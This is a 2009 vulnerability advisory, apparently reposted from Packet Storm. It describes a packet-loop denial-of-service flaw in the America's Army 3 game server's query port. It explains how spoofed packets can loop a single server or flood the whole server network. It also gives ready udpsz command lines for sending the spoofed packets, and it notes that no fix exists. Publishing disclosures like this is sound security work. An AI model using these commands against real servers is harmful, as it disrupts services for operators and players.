Home / vulnerabilities americasarmy-loop.txt
Posted on 14 July 2009
Source : packetstormsecurity.org Link
#######################################################################
Luigi Auriemma
Application: America's Army 3
http://www.americasarmy.com/aa3.php
Versions: <= 3.0.5
Platforms: Windows
Bug: packets loop
Exploitation: remote, versus server
Date: 14 Jul 2009
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
America's Army 3 (AA3) is the new free game of the AA series developed
for the U.S. Army as an help with the military recruitments.
Released about 20 days ago it's already played by thousands of players
and with more than 400 online servers
(http://login.aa3.americasarmy.com/servers).
#######################################################################
======
2) Bug
======
The port 39300 (or 9002 in LAN mode) of the server is used for replying
to the queries of the AA3 clients, sending them back all the
informations about the status of the server and the match.
If the incoming query is invalid, the server replies with a packet
containing the "resultCode" "errorMessage" "failed to validate field
contents" message.
The problem is that this packet is sent back also to if the incoming
query is the same error message so for an attacker is enough to send
one spoofed valid or invalid packet to the query port of the server
using the same source IP and port of the same server for being able to
put it in an endless "ping-pong" state where it sends and receives its
same packets forever.
Anyway the effect doesn't look very dangerous because the server is
still running and there are no problems for the players to join it
except a possible lag caused by the CPU which reaches almost the 100%
(effect increased by the introduction of the leverage ssc encryption
of the query/reply packets in version 3.0.5).
But exists another type of attack involving this vulnerability which
could allow even to perform an automatic distribuited Denial of Service
between all the internet AA3 servers.
Practically if there are, for example, 400 servers online an attacker
needs only to send the spoofed packet from the first server (spoofed
address) to the other 399, then doing the same with the second, the
third and so on creating an endless flooding of the entire network of
servers.
As already said the vulnerability requires the ability of sending
spoofed packets so the attacker must be able to do it.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
udpsz -P SERVER -p 39300 SERVER 39300 1
or
udpsz -l 10 -P SERVER -p 39300 SERVER 39300 1
or
udpsz -P SECOND_SERVER -p 39300 FIRST_SERVER 39300 1
note: instead the LAN servers use port 9002
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
